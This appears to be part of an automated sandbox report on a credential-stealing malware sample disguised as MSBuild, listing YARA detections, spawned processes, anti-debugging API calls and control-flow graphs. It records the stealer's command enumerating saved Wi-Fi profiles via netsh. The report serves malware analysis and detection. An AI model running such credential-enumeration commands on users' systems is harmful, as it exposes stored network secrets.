                                                                                                                                                    • Rule: JoeSecurity_PXRECVOWEIWOEI, Description: Yara detected PXRECVOWEIWOEI Stealer, Source: 00000007.00000002.2118047859.00000000037FC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_PXRECVOWEIWOEI, Description: Yara detected PXRECVOWEIWOEI Stealer, Source: 00000007.00000002.2118047859.0000000003824000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_PXRECVOWEIWOEI, Description: Yara detected PXRECVOWEIWOEI Stealer, Source: 00000007.00000002.2118047859.0000000003828000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2118047859.0000000003381000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:8
                                                                                                                                                    Start time:03:58:41
                                                                                                                                                    Start date:15/01/2025
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                                                                                                    Imagebase:0x800000
                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:9
                                                                                                                                                    Start time:03:58:41
                                                                                                                                                    Start date:15/01/2025
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:10
                                                                                                                                                    Start time:03:58:41
                                                                                                                                                    Start date:15/01/2025
                                                                                                                                                    Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:chcp 65001
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:12'800 bytes
                                                                                                                                                    MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:11
                                                                                                                                                    Start time:03:58:41
                                                                                                                                                    Start date:15/01/2025
                                                                                                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                    Imagebase:0x7ff7ec390000
                                                                                                                                                    File size:69'632 bytes
                                                                                                                                                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:false

                                                                                                                                                    Target ID:12
                                                                                                                                                    Start time:03:58:41
                                                                                                                                                    Start date:15/01/2025
                                                                                                                                                    Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:netsh wlan show profile
                                                                                                                                                    Imagebase:0x1560000
                                                                                                                                                    File size:82'432 bytes
                                                                                                                                                    MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:13
                                                                                                                                                    Start time:03:58:42
                                                                                                                                                    Start date:15/01/2025
                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:findstr All
                                                                                                                                                    Imagebase:0x450000
                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Has exited:true

                                                                                                                                                    Reset < >

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:10.4%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                      Signature Coverage:3.3%
                                                                                                                                                      Total number of Nodes:90
                                                                                                                                                      Total number of Limit Nodes:8
                                                                                                                                                      execution_graph 106316 5e18fd0 106317 5e19016 106316->106317 106321 5e191b0 106317->106321 106324 5e191a0 106317->106324 106318 5e19103 106328 5e18ef4 106321->106328 106325 5e191b0 106324->106325 106326 5e18ef4 DuplicateHandle 106325->106326 106327 5e191de 106326->106327 106327->106318 106329 5e19218 DuplicateHandle 106328->106329 106330 5e191de 106329->106330 106330->106318 106293 5debbc8 106294 5debc0a 106293->106294 106295 5debc10 LoadLibraryW 106293->106295 106294->106295 106296 5debc3d 106295->106296 106221 5e13f69 106225 5e13fd0 106221->106225 106230 5e13fc0 106221->106230 106222 5e13f81 106227 5e13fd8 106225->106227 106226 5e13fec 106226->106222 106227->106226 106235 5e1406b 106227->106235 106228 5e14001 106228->106222 106232 5e13fd0 106230->106232 106231 5e13fec 106231->106222 106232->106231 106234 5e1406b OleInitialize 106232->106234 106233 5e14001 106233->106222 106234->106233 106238 5e1407b 106235->106238 106239 5e14643 106235->106239 106246 5e14650 106235->106246 106238->106228 106240 5e1464b 106239->106240 106241 5e145de 106239->106241 106242 5e1467d 106240->106242 106252 5e161b8 106240->106252 106256 5e16178 106240->106256 106260 5e161ab 106240->106260 106241->106238 106242->106238 106247 5e14668 106246->106247 106248 5e1467d 106247->106248 106249 5e161b8 OleInitialize 106247->106249 106250 5e16178 OleInitialize 106247->106250 106251 5e161ab OleInitialize 106247->106251 106248->106238 106249->106248 106250->106248 106251->106248 106253 5e161c1 106252->106253 106264 5e15d88 106253->106264 106257 5e16175 106256->106257 106257->106256 106258 5e15d88 OleInitialize 106257->106258 106259 5e161ca 106258->106259 106259->106242 106261 5e16175 106260->106261 106261->106260 106262 5e15d88 OleInitialize 106261->106262 106263 5e161ca 106262->106263 106263->106242 106265 5e15d93 106264->106265 106266 5e161ca 106265->106266 106268 5e18f30 106265->106268 106266->106242 106269 5e1a010 OleInitialize 106268->106269 106270 5e1a074 106269->106270 106270->106266 106271 5e113e8 106272 5e11405 106271->106272 106276 59411f1 106272->106276 106281 5941200 106272->106281 106273 5e11ceb 106277 5941215 106276->106277 106278 5941232 106277->106278 106286 5941680 106277->106286 106289 5941650 106277->106289 106278->106273 106283 5941215 106281->106283 106282 5941232 106282->106273 106283->106282 106284 5941680 CheckRemoteDebuggerPresent 106283->106284 106285 5941650 CheckRemoteDebuggerPresent 106283->106285 106284->106282 106285->106282 106287 59416c4 CheckRemoteDebuggerPresent 106286->106287 106288 5941706 106287->106288 106288->106278 106290 5941655 CheckRemoteDebuggerPresent 106289->106290 106292 5941706 106290->106292 106292->106278 106331 5e1a558 106332 5e1a5b2 OleGetClipboard 106331->106332 106333 5e1a5f2 106332->106333 106297 3140e38 106298 3140e3d 106297->106298 106299 3140e82 106298->106299 106301 31416c1 106298->106301 106302 31416d5 106301->106302 106303 3141703 106302->106303 106306 3141f4f 106302->106306 106311 3141f60 106302->106311 106303->106298 106308 3141f65 106306->106308 106307 3141feb 106307->106302 106308->106307 106309 5941200 2 API calls 106308->106309 106310 59411f1 2 API calls 106308->106310 106309->106308 106310->106308 106315 3141f65 106311->106315 106312 3141feb 106312->106302 106313 5941200 2 API calls 106313->106315 106314 59411f1 2 API calls 106314->106315 106315->106312 106315->106313 106315->106314
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2146326029.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5de0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (_^q$(_^q$,bq$4c^q$4c^q$Hbq$Nv]q$$^q$$^q$c^q$c^q
                                                                                                                                                      • API String ID: 0-3459267885
                                                                                                                                                      • Opcode ID: 2a31f940ff2f63094bff4ec0b626327c047fb07bc74f54737c9a1af724c5f6e2
                                                                                                                                                      • Instruction ID: fec4d39754decbc658013895b62c0fd76a905281919443b8ef8f40efa4309f75
                                                                                                                                                      • Opcode Fuzzy Hash: 2a31f940ff2f63094bff4ec0b626327c047fb07bc74f54737c9a1af724c5f6e2
                                                                                                                                                      • Instruction Fuzzy Hash: 5D82A730B801284BCB69EB7D885067D7AE7BFCD740B6048AED406DB394EE35DD464B92

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 2174 5de7cd9-5de7d29 2176 5de7d2b-5de7d33 2174->2176 2177 5de7d35-5de7d39 2174->2177 2178 5de7d3e-5de7d43 2176->2178 2177->2178 2179 5de7d4c-5de7d55 2178->2179 2180 5de7d45-5de7d4a 2178->2180 2181 5de7d58-5de7d5a 2179->2181 2180->2181 2182 5de80c6-5de80f0 2181->2182 2183 5de7d60-5de7d79 call 5de7b60 2181->2183 2207 5de80f7-5de8137 2182->2207 2187 5de7d7b-5de7d8b 2183->2187 2188 5de7dc7-5de7dce 2183->2188 2189 5de805e-5de807b 2187->2189 2190 5de7d91-5de7da9 2187->2190 2192 5de7dd3-5de7de3 2188->2192 2193 5de7dd0 2188->2193 2195 5de8084-5de808d 2189->2195 2194 5de7daf-5de7db6 2190->2194 2190->2195 2196 5de7de5-5de7df1 2192->2196 2197 5de7df3-5de7e10 2192->2197 2193->2192 2198 5de7dbc-5de7dc6 2194->2198 2199 5de8095-5de80bf 2194->2199 2195->2199 2201 5de7e14-5de7e20 2196->2201 2197->2201 2199->2182 2202 5de7e26 2201->2202 2203 5de7e22-5de7e24 2201->2203 2206 5de7e29-5de7e2b 2202->2206 2203->2206 2206->2207 2208 5de7e31-5de7e46 2206->2208 2241 5de813e-5de817e 2207->2241 2209 5de7e48-5de7e54 2208->2209 2210 5de7e56-5de7e73 2208->2210 2212 5de7e77-5de7e83 2209->2212 2210->2212 2214 5de7e8c-5de7e95 2212->2214 2215 5de7e85-5de7e8a 2212->2215 2218 5de7e98-5de7e9a 2214->2218 2215->2218 2220 5de7f22-5de7f26 2218->2220 2221 5de7ea0 2218->2221 2222 5de7f5a-5de7f72 call 5de7a28 2220->2222 2223 5de7f28-5de7f46 2220->2223 2292 5de7ea2 call 5de7cd9 2221->2292 2293 5de7ea2 call 5de81e0 2221->2293 2239 5de7f77-5de7fa1 call 5de7b60 2222->2239 2223->2222 2237 5de7f48-5de7f55 call 5de7b60 2223->2237 2225 5de7ea8-5de7ec8 call 5de7b60 2233 5de7eca-5de7ed6 2225->2233 2234 5de7ed8-5de7ef5 2225->2234 2238 5de7ef9-5de7f05 2233->2238 2234->2238 2237->2187 2242 5de7f0e-5de7f17 2238->2242 2243 5de7f07-5de7f0c 2238->2243 2251 5de7fa3-5de7faf 2239->2251 2252 5de7fb1-5de7fce 2239->2252 2266 5de8185-5de81f7 2241->2266 2244 5de7f1a-5de7f1c 2242->2244 2243->2244 2244->2220 2244->2241 2253 5de7fd2-5de7fde 2251->2253 2252->2253 2255 5de7fe4 2253->2255 2256 5de7fe0-5de7fe2 2253->2256 2258 5de7fe7-5de7fe9 2255->2258 2256->2258 2258->2187 2259 5de7fef-5de7fff 2258->2259 2261 5de800f-5de802c 2259->2261 2262 5de8001-5de800d 2259->2262 2263 5de8030-5de803c 2261->2263 2262->2263 2264 5de803e-5de8043 2263->2264 2265 5de8045-5de804e 2263->2265 2267 5de8051-5de8053 2264->2267 2265->2267 2276 5de81f9-5de8209 2266->2276 2277 5de8221-5de8230 2266->2277 2267->2266 2268 5de8059 2267->2268 2268->2183 2278 5de820b-5de8220 2276->2278 2279 5de8231-5de8267 call 5de7b60 2276->2279 2283 5de826f-5de8276 2279->2283 2284 5de8269-5de826e 2279->2284 2285 5de827b-5de8288 2283->2285 2286 5de8278 2283->2286 2288 5de828a 2285->2288 2289 5de8296-5de82a1 2285->2289 2286->2285 2290 5de8292-5de8295 2288->2290 2292->2225 2293->2225
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2146326029.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5de0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                                                                      • API String ID: 0-1677660839
                                                                                                                                                      • Opcode ID: 21fe0c6a81cb4524fbd05affb608feee2027ab1b304ccc851982cacc5a8bb9d1
                                                                                                                                                      • Instruction ID: 6212d0deb1c8af9578ee6c1501686277d3a689edd0bbe2ad4e90a117125c0cdb
                                                                                                                                                      • Opcode Fuzzy Hash: 21fe0c6a81cb4524fbd05affb608feee2027ab1b304ccc851982cacc5a8bb9d1
                                                                                                                                                      • Instruction Fuzzy Hash: 61F1C231A04296CBCB19DF75C5502BDFBB2FF85300F24866AD446AB341DB75EA86CB90
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2149642682.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f70000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 33b29a637e689913978fc3bfb6bb77a580b46e948af16a66f66814e484d239dc
                                                                                                                                                      • Instruction ID: 8d060973e58c5538eafb6e46b3454bb92e1d316bfe81734923bbe06384a260dd
                                                                                                                                                      • Opcode Fuzzy Hash: 33b29a637e689913978fc3bfb6bb77a580b46e948af16a66f66814e484d239dc
                                                                                                                                                      • Instruction Fuzzy Hash: 95238074D002299FCB659F64DD88A9EBBB6BF48302F1049E9E609A7350DB359ED1CF40
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2149642682.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f70000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ae8a44934b5001c85b51339891d5c24ccfcff9a6747a61328a4187d75e5e0a0d
                                                                                                                                                      • Instruction ID: f2a7dc27ed404d0b834995a4f10f4d7c69e3c24541e1e2099e895553a61824d9
                                                                                                                                                      • Opcode Fuzzy Hash: ae8a44934b5001c85b51339891d5c24ccfcff9a6747a61328a4187d75e5e0a0d
                                                                                                                                                      • Instruction Fuzzy Hash: 0D2380B4D002299FCB659F64DD88A9EBBB6BF48302F1049E9E509A7350DB359ED1CF40
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2149642682.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f70000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: d
                                                                                                                                                      • API String ID: 0-2564639436
                                                                                                                                                      • Opcode ID: 2858167b57c8847fb2247253d1883f15f7b6af2ef7118c6d9f274be6761d2fe0
                                                                                                                                                      • Instruction ID: ab1fddeae6acdc9ced48a56b3ec9deacf8fd127c21d3eb4bfe59e093a28149b5
                                                                                                                                                      • Opcode Fuzzy Hash: 2858167b57c8847fb2247253d1883f15f7b6af2ef7118c6d9f274be6761d2fe0
                                                                                                                                                      • Instruction Fuzzy Hash: E2223A71A001089FDB14CF68C984AADBBF6FF88304F55C66AD519EB265CB34EC46CB84
                                                                                                                                                      APIs
                                                                                                                                                      • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 059416F7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145068648.0000000005940000.00000040.00000800.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5940000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CheckDebuggerPresentRemote
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3662101638-0
                                                                                                                                                      • Opcode ID: 431addd906c2d9e9242c35c01470cb1d136896c01ef7d272c3008bb0f606db9a
                                                                                                                                                      • Instruction ID: 9ebaaafff2e60f85c85bd6ce2fd85cf04550265b8abfeb4af616eca97717d599
                                                                                                                                                      • Opcode Fuzzy Hash: 431addd906c2d9e9242c35c01470cb1d136896c01ef7d272c3008bb0f606db9a
                                                                                                                                                      • Instruction Fuzzy Hash: 432125B1800259CFCB10CF9AD584BEEBBF4AF49324F14846AE459A7250D778A944CFA5
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2116551885.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_3140000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: \VTm
                                                                                                                                                      • API String ID: 0-628799665
                                                                                                                                                      • Opcode ID: 4f35f2294375da9f4dd5e9c0f2e2296d06ee23aff4d19c9c16480f018f5b52d9
                                                                                                                                                      • Instruction ID: 9e58a21fa1c2042f86cbb05cbd01bb80ed4b0a5c9451ed2eb2b61d6b607664ec
                                                                                                                                                      • Opcode Fuzzy Hash: 4f35f2294375da9f4dd5e9c0f2e2296d06ee23aff4d19c9c16480f018f5b52d9
                                                                                                                                                      • Instruction Fuzzy Hash: 81B14D70E002099FDB14CFA9C9957DDBBF2BF8C714F188129E815AB394EB749846CB91
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ae80365f3a78a4128f422d3d6f1c920d60c0ddaa16f21bb943d61924b8c3e7e1
                                                                                                                                                      • Instruction ID: 6e0fbc1e05d14d7ef2310044454d6d5ef0f19d7da7102bfc532e329337470b7f
                                                                                                                                                      • Opcode Fuzzy Hash: ae80365f3a78a4128f422d3d6f1c920d60c0ddaa16f21bb943d61924b8c3e7e1
                                                                                                                                                      • Instruction Fuzzy Hash: F3A26E74D012299FCB64EFA4D998A9DBBB5FF48301F1089E9E409A7364DB359E81CF40
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2150748429.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_6110000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 5898777877acf4089061fce8aec76d4fafeaf3395f382da10bcd2e0df17ad339
                                                                                                                                                      • Instruction ID: 5a450caa45ce835fa373eeabaf9d811eab53c5fb52073f4e224b4bfbcba0c086
                                                                                                                                                      • Opcode Fuzzy Hash: 5898777877acf4089061fce8aec76d4fafeaf3395f382da10bcd2e0df17ad339
                                                                                                                                                      • Instruction Fuzzy Hash: 56A26E74D012299FCB64EFA4D988A9DBBB5FF48301F1089E9E509A7324DB359E81CF40
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2146326029.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5de0000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 2b2c6c20b4310f31787082e70d5717d615196698425ab1f5e90f8eb27d3775e9
                                                                                                                                                      • Instruction ID: 3d05c1b9fd3ae68a8d2a74c5634174ded55d46626dbcf3ef6c8bd90aa15eee89
                                                                                                                                                      • Opcode Fuzzy Hash: 2b2c6c20b4310f31787082e70d5717d615196698425ab1f5e90f8eb27d3775e9
                                                                                                                                                      • Instruction Fuzzy Hash: CF82AC34A05216CFDB24DF25C99AB697BB6FB48308F5041E9D48A8B3A1DB34DC86DF41
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145068648.0000000005940000.00000040.00000800.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5940000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 5a915f7c5c2297013bb8b4afcae770248dd9aa9a9e8349bd20c1cb285a3e91de
                                                                                                                                                      • Instruction ID: 8d1f3d8f356966126c1fa6ddbeb335fed70103a8969f65708c93c964daf7d729
                                                                                                                                                      • Opcode Fuzzy Hash: 5a915f7c5c2297013bb8b4afcae770248dd9aa9a9e8349bd20c1cb285a3e91de
                                                                                                                                                      • Instruction Fuzzy Hash: 3A02A131B003195BDB19AA39C590A7E71EBFBC4654B644C2CD409DF394DE76DC4B8B82
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2145068648.0000000005940000.00000040.00000800.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5940000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f682af27a7bfc4196674084305b675f8170a23d466be07a531902669f50a0c4d
                                                                                                                                                      • Instruction ID: 3a6ec627a51fef687b228c11fc9ddb62774f58c918e00281016d9badf40cceb6
                                                                                                                                                      • Opcode Fuzzy Hash: f682af27a7bfc4196674084305b675f8170a23d466be07a531902669f50a0c4d
                                                                                                                                                      • Instruction Fuzzy Hash: C502A031B003196BDB19AA39C590A7E71EBFBC4654B644C2CD40ADF394DE76DC4B8B82
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2116551885.0000000003140000.00000040.00000800.00020000.00000000.sdmp, Offset: 03140000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_3140000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 12f765e9f3a823620d73bafc5996f4582226bdfaf356d4a89856b12310f1fae2
                                                                                                                                                      • Instruction ID: 7e1ae44c2b064cafc8b2e4fdfc1a9151067c24b85ad41e387f38cdab79693567
                                                                                                                                                      • Opcode Fuzzy Hash: 12f765e9f3a823620d73bafc5996f4582226bdfaf356d4a89856b12310f1fae2
                                                                                                                                                      • Instruction Fuzzy Hash: 5EB15170E002099FDB14CFA9C99579DBBF2AF4C714F288129D415EB354EB749896CB81

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 0 5e27d08-5e27d0a 1 5e27d11-5e27d12 0->1 2 5e27d0c-5e27d10 0->2 3 5e27d13-5e27d18 1->3 4 5e27d19-5e27d50 1->4 2->1 3->4 10 5e27d55-5e27d58 call 5e29fe0 4->10 11 5e27d5e-5e27dc6 10->11 21 5e27dcf 11->21 22 5e27dd8-5e27e6c 21->22 33 5e27e71 22->33 607 5e27e74 call 5e2a650 33->607 608 5e27e74 call 5e2a5b8 33->608 34 5e27e7a 35 5e27e83-5e27eda 34->35 43 5e27ee2 35->43 609 5e27ee5 call 5e2a8f1 43->609 610 5e27ee5 call 5e2a848 43->610 44 5e27eeb 45 5e27ef4-5e280df 44->45 79 5e280e4-5e280ea call 5e2af3b 45->79 80 5e280f0-5e282db 79->80 112 5e282e6 80->112 113 5e282f2-5e283c4 112->113 127 5e283d0 113->127 128 5e283dc-5e2844f 127->128 135 5e2845a-5e28466 call 5e2bad1 128->135 137 5e28472-5e28527 135->137 148 5e2852c-5e28538 call 5e2bcf8 137->148 150 5e28544-5e285b9 148->150 158 5e285c4 150->158 159 5e285d0-5e28691 158->159 171 5e28696-5e2869c call 5e2c1f1 159->171 172 5e286a2-5e2892f 171->172 214 5e28935-5e28941 172->214 215 5e2894c-5e28e35 214->215 296 5e28e40 215->296 297 5e28e4c-5e28f9f 296->297 319 5e28faa 297->319 597 5e28fb0 call 6110139 319->597 598 5e28fb0 call 6110148 319->598 320 5e28fb6-5e28fc2 322 5e28fce-5e2907c 320->322 333 5e29088 322->333 334 5e29094-5e29114 333->334 342 5e2911f 334->342 605 5e29125 call 6110b01 342->605 606 5e29125 call 6110b10 342->606 343 5e2912b-5e29143 346 5e2914f 343->346 347 5e2915b-5e291b6 346->347 352 5e291bc-5e291c8 347->352 353 5e291d3-5e291f1 352->353 356 5e291fd-5e29209 353->356 358 5e29215-5e2927e 356->358 365 5e29289 358->365 612 5e2928f call 6110f58 365->612 613 5e2928f call 6110f4b 365->613 366 5e29295-5e2935b 379 5e29367 366->379 380 5e29373-5e2986d 379->380 465 5e29872 380->465 602 5e29878 call 6111e50 465->602 603 5e29878 call 6111e40 465->603 466 5e2987e-5e29c20 532 5e29c2c 466->532 533 5e29c38-5e29c50 532->533 536 5e29c5c-5e29c6e 533->536 537 5e29c7a-5e29fce 536->537 597->320 598->320 602->466 603->466 605->343 606->343 607->34 608->34 609->44 610->44 612->366 613->366
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000007.00000002.2147158571.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_7_2_5e20000_MSBuild.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q$LR^q
                                                                                                                                                      • API String ID: 0-3940867653
                                                                                                                                                      • Opcode ID: 026e374664b22549dc1cd5fa5508b6d1a3f0f3ab601214abfbecfb003ceb83e1
                                                                                                                                                      • Instruction ID: cccd2a75df6568d76726a9a2b347d085a34a71a5b9bb0069511b05654906690a
                                                                                                                                                      • Opcode Fuzzy Hash: 026e374664b22549dc1cd5fa5508b6d1a3f0f3ab601214abfbecfb003ceb83e1
                                                                                                                                                      • Instruction Fuzzy Hash: AA23BFB4D143299FCB65AF74DD48A9DBBB2BF48302F1045E9E50AA7220DB359E91CF40

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
